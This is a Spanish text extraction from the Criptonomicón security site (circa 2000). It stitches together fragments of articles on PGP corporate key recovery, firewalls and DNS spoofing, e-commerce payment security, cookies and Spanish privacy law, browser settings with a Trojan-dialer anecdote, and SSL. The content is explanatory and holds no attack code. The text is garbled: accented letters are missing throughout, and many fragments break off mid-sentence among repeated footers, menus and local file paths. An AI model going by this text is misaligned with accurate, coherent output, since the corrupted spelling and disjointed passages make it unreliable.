versiones que circulaban en ultramar haban sido ilegalmente exportadas. Y,
aunque la distribucin del programa era legal una vez fuera de EEUU, el
regustillo de ilegalidad no gustaba a muchos. As que la idea que surgi fue:
comprar el cdigo fuente impreso, llevarlo fronteras afuera, someterlo a un
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos36.html (4 of 7) [25/10/2000 02:31:06 p.m.]
la versin 5.5 contiene una, para muchos inquietante, nueva opcin, llamada
recuperacin corporativa de claves. La cuestin es la siguiente. NAI quiere,
evidentemente, ganar dinero, y una de las maneras ms efectivas es
vendiendo productos diseados para entornos empresariales. El problema
que se puede plantear es el siguiente. Si un particular compra PGP y lo usa
mal (por ejemplo, olvidando su contrasea), sobre su cabeza caiga. Sin
embargo, mal servicio hara a una empresa usar PGP si al tesorero de la
compaa lo atropella un autobs y, casualmente, es el nico que tiene la
contrasea para descifrar archivos vitales. Debe la empresa quedarse
ciega cuando un empleado le falta por enfermedad, vacaciones o despido?
La solucin consiste en cifrar los mensajes con dos claves: una del
empleado y otra de la empresa. Esta ltima, llamada "clave corporativa",
quedara en poder del administrador. En condiciones normales, no es
necesaria, pero en caso de necesidad se puede usar para descifrar la
correspondiente copia del mensaje o archivo de inters. Es como una
ganza maestra para casos de emergencia. Dejemos aparte el debate que
se gener sobre si el jefe tiene derecho o no a leer los mensajes de sus
empleados. La recuperacin de claves permita que alguien, adems del
usuario, tuviese la posibilidad de descifrar sus mensajes. Las consecuencias
son de mucho alcance. De qu sirve el criptoprograma ms potente de la
historia si un tipo al que no conoces puede leer tus mensajes? Qu pasa si
un juez obtiene el acceso a los mensajes por medio de una orden judicial
contra la empresa?
Por supuesto, las versiones no-corporativas no contienen esta posibilidad, e
incluso los programas para entorno empresarial lo incluyen de modo
opcional, no obligatorio. Pero es un paso fuera de la filosofa estilo Mulder:
no confes en nadie. En cualquier caso, las claves personales (privadas) de
uno no estn comprometidas. Lo nico que puede hacer el jefe es leer
mensajes cifrados con la clave corporativa; la clave del usuario sigue siendo
solamente del usuario.
Y ahora viene lo ms gordo. Cuando Network Associates compr PGP Inc.
formaba parte de una asociacin de empresas de software llamada Key
Recovery Alliance (Alianza para la Recuperacin de Claves). La KRA es un
"lobby" o grupo de intereses que favorece el establecimiento de "puertas
traseras" en los productos criptogrficos. Segn esto, el gobierno podra
obtener una copia de nuestra clave privada cuando le viniese en gana, o
bien acceder a nuestros mensajes cifrados por medio de una puerta trasera
imbuida en el software del programa. Que el programa de Zimmermann
contuviese mecanismos para recuperacin de claves era el colmo, e hizo
que muchos usuarios se replantearse el uso de versiones de PGP
posteriores a la 2.6.x para DOS.
Puesto que el cdigo fuente de los programas era an accesible, se pudo
comprobar que, de momento, las versiones 5.0/5.5 no cuentan con puertas
traseras. De hecho, Network Associates abandon la KRA debido a las
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos36.html (6 of 7) [25/10/2000 02:31:06 p.m.]
presiones de los usuarios. Pero una empresa con fuertes contratos con el
gobierno EEUU resulta ms vulnerable a "persuasin" que el idealista to
Phil. Podremos seguir findonos de versiones 6 y posteriores? Quin sabe.
Si la empresa contina ofreciendo el cdigo fuente para revisin, y si
consigue mantenerse al margen de las batallas que el FBI y la NSA llevan a
cabo para controlar o limitar la expansin de productos criptogrficos, tal vez
consiga mantener la confianza de los usuarios.
Publicado en el Boletn del Criptonomicn #36.
Arturo Quirantes Sierra es profesor de fsica de la Universidad de Granada y autor de las
famosas pginas entre los seguidores de este boletn, el "Taller de Criptografa", donde
destaca ltimamente la intensa labor de informacin que est realizando en una cruzada
contra Enfopol.
Informacin adicional
La seccin PGP
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Cortafuegos
Comercio electrnico
Criptologa y seguridad
Cortafuegos
Cuestiones legales
Intimidad y privacidad
Virus
Cortafuegos
Cortafuegos
Cortafuegos
atendiendo a este log donde se podr observar que nuestra red interna esta
siendo escaneada y que puede estar sometida a un ataque organizado
desde algn lugar en Internet.
Por ltimo volver sobre la importancia de disponer de una correcta poltica
de seguridad en la empresa. Ya que de ella depender el grado de
seguridad frente al uso indebido de los recursos corporativos. Esta poltica
de seguridad debera implicar a todos los miembros de la empresa mediante
la formacin de sus empleados en cuanto a la importancia de que sus
contraseas de usuario sean seguras (no susceptibles a ataques de fuerza
bruta o fcilmente adivinables), de que apaguen sus ordenadores cuando se
ausenten de sus sitios o protejan sus escritorios, e incluso de que tengan
cuidado con sus disquetes u hojas impresas con informacin sensible (no
sera la primera vez que se reutiliza hojas con informacin de proyectos
estratgicos de empresas). Todo esto depende del grado de seguridad (o de
paranoia) que se quiera reflejar en la poltica de seguridad de las empresas,
y variar mucho de unas empresas a otras.
En todo caso la poltica de seguridad debera proponer una mezcla de los
dos enfoques que haca referencia anteriormente: Defensa perimetral con un
cortafuegos bien configurado de acuerdo con la poltica de seguridad de la
empresa y defensa en profundidad de los servidores que vayan a ser
accedidos desde las redes pblicas.
Los servidores de Web deberan estar protegidos frente a ataques tpicos
realizados contra estos servidores: stack overflow de sus cgis, posibilidad de
acceder al document root de la mquina y poner un documento HTML no
legtimo, etc.
Lo mismo se puede decir de los servidores FTP, servidores de correo e
incluso servidores de DNS, todos ellos con sus bugs caractersticos
dependiendo de la versin y plataforma sobre la que corren (NT o UNIX),
pero a medida que se descubre un bug se publica el parche para el servidor
correspondiente, y es labor del administrador de la red el estar al tanto de
estos parches, ya que el cortafuegos puede estar bien configurado y dejar
pasar peticiones de DNS a nuestro servidor de DNS, pero nuestro servidor
de DNS puede ser susceptible a ataque de tipo DNS spoofing, por el cual se
le puede llegar a hacer creer a nuestro servidor DNS que
web_al_que_accede_nuestra_organizacin.com Sitio web al que accedemos
diariamente y que nos pide un password de entrada , es en realidad
web_malicioso_para_capturar_passwords.com y que entreguemos muchas
de nuestras passwords a alguien en Internet. Y todo esto con nuestro
cortafuegos bien configurado.
Publicado en el Boletn del Criptonomicn #35.
Luis Ventura Ruiz es ingeniero de telecomunicacin de Euskaltel con una amplia
experiencia en la instalacin de cortafuegos.
Cortafuegos
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Introduccin
Virus
permitan recuperar las claves de los usuarios por los realizadores del
programa.
Es posible utilizar mtodos basados en los Criptosistemas Libres de Abuso
para desarrollar protocolos interactivos entre los navegadores y entidades de
certificacin que permitieran evitar estos problemas pero es difcil
implementarlos por la dificultad de establecer estndares en estos sistemas.
La solucin ms sencilla es utilizar software fiable para realizar las
comunicaciones que requieran seguridad. Especialmente software de
distribucin abierta, en cdigo fuente, que se puede comprobar, y lo ms
importante, compilar en la propia mquina reduciendo drsticamente las
posibilidades de ser contaminado.
El prximo desarrollo de cryptozilla, la versin segura de mozilla, ampla
considerablemente las posibilidades de eleccin en materia de seguridad
para los usuarios.
Publicado en el Boletn del Criptonomicn #33.
Jaime Agudo Bretos es investigador de la Universidad de Zaragoza, experto en
criptografa.
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Introduccin
Virus
el DES, pero que poco a poco estn siendo remplazados por algoritmos de
clave pblica como el RSA con el fin de favorecer la interoperabilidad de los
sistemas.
Integridad
Otro aspecto importante en todo sistema de pago electrnico es la integridad
de los datos intercambiados entre los agentes del sistema, mxime cuando
esos datos se refieren a importes de un pago, a un nmero de cuenta
bancaria, etc. La integridad de las comunicaciones es garantizada mediante
cdigos de autenticacin de mensajes (MACs), funciones resumen y firmas
digitales. En el caso de la relacin cliente - comercio, esto slo es posible
cuando el cliente est en posesin de un dispositivo con capacidad de
clculo y de almacenamiento seguro de claves, como es el caso de una
tarjeta inteligente.
Adems, es tambin importante salvaguardar la integridad de los datos
almacenados en los dispositivos asociados a cada agente. Las claves
criptogrficas, los certificados, las listas negras, los datos para el intercambio
de operaciones, etc., necesitan ser protegidos contra la alteracin voluntaria
o involuntaria de los mismos. Esto se consigue de muy diversas maneras
segn el tipo de agente y segn el dispositivo asociado a l. As por ejemplo,
las claves criptogrficas de clientes y comercios suelen almacenarse en
tarjetas inteligentes y mdulos de seguridad (SAMs) respectivamente. Las
listas negras en los comercios se verifican y renuevan peridicamente y los
datos en los servidores de las entidades financieras que intervienen en el
sistema de pago de son almacenados en bnkers de seguridad que
normalmente se encuentran duplicados para evitar las posibles prdidas de
informacin como consecuencia de posibles fallos.
Confidencialidad
Ciertos datos intercambiados durante una transaccin de pago necesitan ser
ocultados a la vista de todo el mundo salvo para el agente al que van
destinados dichos datos. Es el caso de la informacin asociada con la
cuenta bancaria de un titular que se transmite a travs de una red y que slo
concierne al titular y a la entidad bancaria depositaria de dicha cuenta.
Tambin ciertos datos asociados con los bienes o servicios adquiridos son
susceptibles de ocultacin en cuanto a que pueden constituir datos sensibles
que en manos de terceros pudieran causar un grave perjuicio directo o
indirecto al cliente.
La confidencialidad es normalmente garantizada mediante el cifrado de
datos. Sin embargo, sta cuestin est resultando ser un problema en la
mayora de los pases debido a las restricciones impuestas por los diferentes
gobiernos para utilizar algoritmos criptogrficos de cifrado de datos con un
alto nivel de seguridad. En algunos pases (Francia) el cifrado de datos est
absolutamente prohibido sin el permiso de la oficina gubernamental
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
LOS VIRUS
Virus
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
efectuaba cara a cara, por telfono o bien por correo postal. Sin embargo,
gracias a las innovaciones tcnicas acontecidas en los ltimos aos, se ha
producido el nacimiento de un nuevo tipo de comercio, el denominado
comercio electrnico.
El comercio electrnico es un servicio de la tecnologa que permite la
realizacin de operaciones de negocios y la compraventa de bienes y
servicios mediante la utilizacin de sistemas electrnicos, como por ejemplo
los ordenadores personales, hoy ya tan habituales en muchos hogares. En
definitiva, este nuevo mercado electrnico nos permite tener en nuestro
domicilio una gran galera comercial por la que podemos pasear de forma
fcil y rpida con el ratn de nuestro ordenador, y todo ello sin movernos de
casa.
El comercio electrnico no es algo totalmente nuevo, si se tiene en cuenta
que desde hace ya ms de una dcada existe un protocolo denominado EDI
(Electronic Data Interchange) para el intercambio electrnico de
documentos. Existen muchas otras variantes de comercio electrnico, como
por ejemplo el denominado home-banking, que permite al usuario realizar
operaciones en sus cuentas bancarias igualmente desde su ordenador
personal.
Todo lo anterior se hace posible gracias a la existencia de grandes redes
digitales de comunicacin a nivel mundial, que facilitan las transacciones
entre las partes implicadas. Entre ellas merece especial mencin la red
Internet, la cual da cobertura a millones de usuarios: personas, negocios,
empresas, revistas y todo tipo de sociedades.
Las ventajas del comercio electrnico son evidentes. El comprador puede
ver de manera rpida todo el escaparate electrnico y no tiene que ir tienda
por tienda en busca del producto deseado. Se optimiza tambin el tiempo de
atencin al cliente, que no tiene que esperar largas colas para ser atendido.
Por su parte, el vendedor tambin se beneficia, puesto que puede ofertar sus
productos sin necesidad de mostrarlos fsicamente al comprador. Otras
ventajas del comercio electrnico son las siguientes:
1) Reduce los retrasos gracias a la velocidad de transmisin
2) Disminuye el ciclo de produccin, creando mercados ms competitivos
3) Hace posible la igualdad de trato a los clientes independientemente de
sus caractersticas individuales: nacionalidad, lugar de residencia, etc.
4) Ampla de forma considerable el mercado potencial de las empresas
5) Faculta a las pequeas y medianas empresas el acceso a mercados que
de otra manera tendran vetados por su elevado coste
Pese a todo, tambin es cierto que este tipo de comercio presenta sus
inconvenientes, algunos de ellos potencialmente peligrosos y todava por
solucionar. Entre ellos, el ms importante es la falta de seguridad en los
procesos de compraventa. En el caso del comercio tradicional, como se ha
indicado anteriormente, las mayora de transacciones se efectan cara a
cara, por telfono o por correo. Todas estas actividades pueden
considerarse intrnsecamente seguras. Sin embargo, en el caso del comercio
electrnico, la interaccin entre comprador y vendedor se realiza a travs de
una red abierta (Internet), que no puede considerarse un canal de
comunicacin seguro a menos que se adopten ciertas medidas de
proteccin.
El estudio y desarrollo de estas medidas de proteccin es precisamente uno
de los objetivos fundamentales de la criptografa. sta proporciona al
comercio electrnico las herramientas necesarias para garantizar, dado el
caso, el carcter secreto de la informacin intercambiada (confidencialidad),
as como la no manipulacin de la misma entre el origen y el destino
(integridad).
Sin embargo, el problema de la identificacin de las partes (autenticacin)
todava no est del todo resuelto. A este respecto, conviene sealar que una
de las situaciones ms preocupantes actualmente es la publicacin de los
datos personales y confidenciales del comprador (como por ejemplo el
nmero de su tarjeta de crdito) en un medio totalmente abierto como es
Internet. Otro tema pendiente de resolver es el de cmo obtener los
resguardos que permitan realizar posteriores reclamaciones tanto al
comprador como al vendedor en el caso de que alguno de ellos se sienta
perjudicado por el otro una vez concluida la transaccin.
Hoy da existen diferentes protocolos como el SET (Secure Electronic
Transaction) o el SSL (Secure Sockets Layer) que se ocupan de que este
tipo de transacciones a travs de redes informticas sean lo ms seguras
posibles. Sin embargo, ninguno de ellos ofrece todava una seguridad
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
realizar.
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Comercio electrnico
Criptologa y seguridad
Cuestiones legales
Intimidad y privacidad
Virus
ordenador del usuario. Se crean por los sevidores web con el objeto de ser
envados a los programas navegadores del usuario, y as recoger la
informacin que dicho fichero ha reunido.
La informacin que es revelada a la web visitada, puede ser utilizada por los
administradores de sistemas para construir perfles personales de las
personas que les visitan. Colocando una cookie en el navegador de un
visitante, automticamente el servidor registra informacin en la cookie. Esto
permite que los administradores puedan ver por ejemplo el histrico de sitios
que el usuario ha visitado antes de entrar en la web, as como los anuncios
que ha visto, nmero de transacciones realizadas en la web etc. En
resumen, son una funcin valiosa en la web, ya que a raz de la informacin
obtenida pueden realizar estudios minuciosos de los hbitos del consumidor,
preferencias en la web, tiempo dedicado etc. Para muchas empresas
constituye la principal herramienta de marketing empresarial en la Web.
Por tanto nos encontramos con un poderoso instrumento de obtencin de
informacin para el administrador de un servidor y para los departamentos
de marketing de las empesas que tienen una pgina web en Internet. Esta
forma de producir informacin puede extralimitar los derechos de privacidad
que los internautas poseen y por tanto infringir los preceptos legales de la
Ley Orgnica Reguladora del Tratamiento Auomatizado de los Datos de
Carcter personal (L.O.R.T.A.D.). Segn la LORTAD datos personales son
aquellos que contengan cualquier informacin concerniente a personas
fsicas identificadas o identificables. Por tanto desde el momento en que la
cookie cumpla estos requisitos existir una lesin al derecho a la intimidad.
Un caso evidente de lesin a la intimidad sera en el caso de las direcciones
IP fijas. Un uso manifiesto de la direccin IP puede llegar a revelar la
identidad de esa persona . No ocurrira lo mismo con las direcciones IP
dinmicas ya que no todos los usuarios de dichas direcciones utilizan la
misma direccin IP.
Informacin adicional
Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar
Borrar
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
file:///C|/TEMP/criptonomicon/criptonomicon/images/simetrico.gif
file:///C|/TEMP/criptonomicon/criptonomicon/images/asimetrico.gif
Consejos para
administradores
Consejos para
usuarios
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Es muy probable que se sorprenda de la cantidad de plug-ins que posee, sin ser
consciente de ello. Quin los puso ah? Usted, cuando instal otros programas, que a
lo mejor en algn momento de la instalacin le interrogaron acerca de su deseo de
aadir un programa para su integracin con el navegador.
Si te preocipa tu seguridad al navegar por Internet, puedes consultar la gua ms
completa sobre navegacin segura en Internet.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Preferencias
Informacin de
seguridad
Netwatch
EL sitio Web informaba a los usuarios desprevenidos, vidos de
sexo, que las fotos que ofrecan eran totalmente gratis. Ahora bien, para ver las
fotografas era necesario descargar un visor de imgenes especial. Como los
navegantes ya estn acostumbrados a instalar plug-ins y aplicaciones de ayuda, no le
prestaban mayor importancia y lo instalaban inocentemente en su ordenador. Lo que
no podan imaginar es que en realidad se trataba de un caballo de Troya. Al ejecutar
este visor especial, silenciaba el altavoz del mdem del usuario, a continuacin lo
desconectaba del proveedor de acceso a Internet que estuviera utilizando y se
conectaba sigilosamente a un nmero de telfono en Moldavia, en la antigua Unin
Sovitica. De Moldavia, la llamada se rediriga a un ordenador en Scarborough, en
Norteamrica, donde se encontraban almacenadas las fotos pornogrficas que se
presentaban al usuario. De manera subrepticia, el ordenador del navegante en Canad
estaba accediendo a un servidor en Scarborough a travs de una llamada de larga
distancia a Moldavia. Lo que es ms, aunque el usuario se cansase de ver pornografa
y saltase a otros sitios Web abandonando sexygirls.com, continuaba hacindolo
conectado con Moldavia que funcionaba ahora como proveedor de servicio, con los
pasos corriendo a ritmo frentico.
Netscape Communicator
Intenet Explorer
Preferencias
Informacin de
seguridad
Netwatch
El hecho de que exista en Netscape Communicator un men con
el nombre Informacin sobre seguridad puede confundir a los usuarios al inducirles a
creer que basta con entender y configurar correctamente lo que aparece en dichos
mens para garantizar la navegacin segura. Como se ver a continuacin, existen
otras muchas opciones repartidas por diferentes mens que no deben dejarse al azar.
General
Seguridad
Contenido
Conexin
Programas
Opciones avanzadas
Pestaa General
En Archivos temporales de Internet se puede
configurar el tamao de cache de disco y su localizacin, pulsando
el botn de Configuracin. Se aplican los mismos
comentarios y consejos que se vieron para Netscape.
En Historial se puede configurar el nmero de das que
Internet Explorer mantiene las pginas visitadas. Se aplican los
mismos comentarios y consejos que se vieron para Netscape.
General
Seguridad
Contenido
Conexin
Programas
Opciones avanzadas
Pestaa Seguridad
Desde la versin 4.x de Internet Explorer, la seguridad al navegar
se fundamenta en las zonas de seguridad, que constituyen un
medio de reducir la complejidad de la seguridad del sistema al
asignar polticas de seguridad a grupos enteros de sitios.
General
Seguridad
Contenido
Pestaa Contenido
General
En Restricciones, al igual que NetWatch en Netscape,
Internet Explorer incorpora un Asesor de contenidos para ayudarle
Seguridad
a controlar el tipo de contenidos de Internet a los que tiene acceso
su equipo. Una vez activado el Asesor de contenido, slo podrn
Contenido
mostrarse los contenidos restringidos que satisfagan o excedan los
criterios que determine. Con el fin de evitar que otros usuarios
Conexin
vean o cambien su configuracin, sta se protege mediante una
Programas
contrasea. A partir del momento en que se activa el Asesor de
contenido, nadie que use su navegador podr saltarse las
restricciones. El inconveniente de utilizar el Asesor es que si no se Opciones avanzadas
activa la casilla Los usuarios pueden ver sitios no restringidos
(en la pestaa General dentro de Asesor de contenido), al ser tan pocas las
pginas actualmente clasificadas, la navegacin se volvera prcticamente imposible.
Esto empuja normalmente a activar dicha casilla, con lo cual se podr navegar por la
casi totalidad de sitios Internet, especialmente con contenidos violentos o sexuales,
los cuales con toda seguridad no incluirn una clasificacin. Este obstculo vuelve
este sistema inservible en la prctica.
Pestaa Conexin
Desde esta pestaa se puede configurar el servidor proxy de
acceso a Internet. Se aplican los mismos comentarios y consejos
que se vieron para Netscape.
General
Seguridad
Contenido
Conexin
Programas
Opciones avanzadas
Pestaa Programas
Ofrece la posibilidad de configurar qu programa de correo y
lector de noticias desea utilizar integrado con Internet Explorer.
Generalmente, al instalar la versin 4.x del navegador se instala
asimismo el cliente de correo Outlook Express, que aparecer
como predeterminado, de manera que en el futuro, cada vez que
enve correo desde Internet Explorer se har a travs del programa
que se haya especificado aqu.
Si no desea que sitios web obtengan inadvertidamente su
direccin de correo, como se discuti al hablar de la Identidad en
Netscape, debera configurar Outlook Express (o su cliente
preferido) con una cuenta falsa (en Outlook Express se hace en
Herramientas/Cuentas.../Pestaa Correo/Botn
Agregar/Correo...).
General
Seguridad
Contenido
Conexin
Programas
Opciones avanzadas
Por supuesto, resulta menos complicado leer las ventanas de aviso que se le
presentan mientras navega, ya que Internet Explorer (a diferencia de Netscape
Navigator, que lo hace desde las versiones 4.x en adelante) siempre le avisar antes
de enviar correo automticamente, en vez de enviar correos sin ton ni son.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Proyecto piloto
Web seguro
Puedes acceder a nuestro proyecto piloto de autoridad de certificacin y ver todos los
conceptos anteriores en funcionamiento.
Referencias
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Libro de Visitas
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
JavaScript
Introduccin
El protocolo SSL es un sistema diseado y propuesto por
Netscape Communications Corporation. Se encuentra en la pila
SSL
OSI entre los niveles de TCP/IP y de los protocolos HTTP, FTP,
S-HTTP
SMTP, etc. Proporciona sus servicios de seguridad cifrando los
SSL vs S-HTTP
datos intercambiados entre el servidor y el cliente con un
Certificados
algoritmo de cifrado simtrico, tpicamente el RC4 o IDEA, y
Cmo obterner uno
cifrando la clave de sesin de RC4 o IDEA mediante un algoritmo
de cifrado de clave pblica, tpicamente el RSA. La clave de sesin es la que se
utiliza para cifrar los datos que vienen del y van al servidor seguro. Se genera una
clave de sesin distinta para cada transaccin, lo cual permite que aunque sea
reventada por un atacante en una transaccin dada, no sirva para descifrar futuras
transacciones. MD5 se usa como algoritmo de hash.
Cookies
Linux
Navegacin segura
Control de acceso
CGI
Java
Crashes
Agujeros
Cuando el cliente pide al servidor seguro una comunicacin segura, el servidor abre
un puerto cifrado, gestionado por un software llamado Protocolo SSL Record,
situado encima de TCP. Ser el software de alto nivel, Protocolo SSL Handshake,
quien utilice el Protocolo SSL Record y el puerto abierto para comunicarse de forma
segura con el cliente.
Spam
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
La fase de verificacin del servidor, presente slo cuando se usa RSA como
algoritmo de intercambio de claves, y sirve para que el cliente autentique al
servidor.
La fase de autenticacin del cliente, en la que el servidor solicita al cliente un
certificado X.509 (si es necesaria la autenticacin de cliente).
Por ltimo, la fase de fin, que indica que ya se puede comenzar la sesin
segura.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Introduccin
SSL
S-HTTP
SSL vs S-HTTP
Certificados
Cmo obterner uno
Java
Secure * Secure-HTTP/1.1
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
